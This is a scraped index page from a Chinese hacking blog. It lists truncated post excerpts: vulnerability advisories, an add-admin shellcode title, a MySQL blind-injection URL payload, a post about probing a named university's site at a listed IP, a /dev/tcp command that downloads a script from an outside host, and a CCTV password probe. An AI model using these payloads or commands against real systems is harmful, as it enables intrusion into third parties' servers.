14x security team

Flamingo's youth

Ceragon FiberAir IP-10硬编码凭证安全绕过漏洞

Ceragon FiberAir IP-10硬编码凭证安全绕过漏洞


CNVD-ID CNVD-2015-00446
发布时间 2015-01-21
危害级别

Windows 添加管理员用户通用版本Shellcode

Windows 添加管理员用户通用版本Shellcode


Title:       Add Admin User Shellcode (194 bytes) - Any Windows Version
Release date:      21/06/2014
Author:   Giuseppe D''Amore (

Two Pilots Exif Pilot缓冲区溢出漏洞

Two Pilots Exif Pilot缓冲区溢出漏洞


CNVD-ID CNVD-2015-00732
发布时间 2015-01-29
危害级别

接口的引入式攻击设想

接口的引入式攻击设想


对于逻辑参数过滤不严可进行接口的引入攻击

那么这个原理基于认证基础的.\ .\ ,可测试XSS的相关漏洞,也是相对的原理

那么接口的漏洞,一般就与认证有关,就是认证当前用户,以及认证当前的状态等等


一个设想的例子,存在逻辑漏洞的页面: 这里就好比www

一台美国服务器

一台美国服务器 



psb99.p<!--autointro--></span></p></div>
	<h5 class=

mysql盲注常用语句

 mysql盲注常用语句


http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/@@version/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(s

友情目标:四川师范大学文理学院

友情目标:四川师范大学文理学院


未深入.简单玩玩

===================================、
规则:静态。。 jsp


二级域名下有很多动态~~


125.71.200.234
http://125.

Linux渗透爱好者的小技巧

Linux渗透爱好者的小技巧


1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&

其实这样也可以钓鱼的

其实这样也可以钓鱼的



<!--autointro--

GET传送漏洞案例分析(CCTV为例)

GET传送漏洞案例分析(CCTV为例)


GET真的安全吗?原理

你要在硕大的CCTV去找1个传送漏洞貌似很难

不过我们就来想下

我们就来爬下::/cntv:passwd

爬到了一位:

Powered By Z-BlogPHP 1.6.0 Valyria

Group adding function is off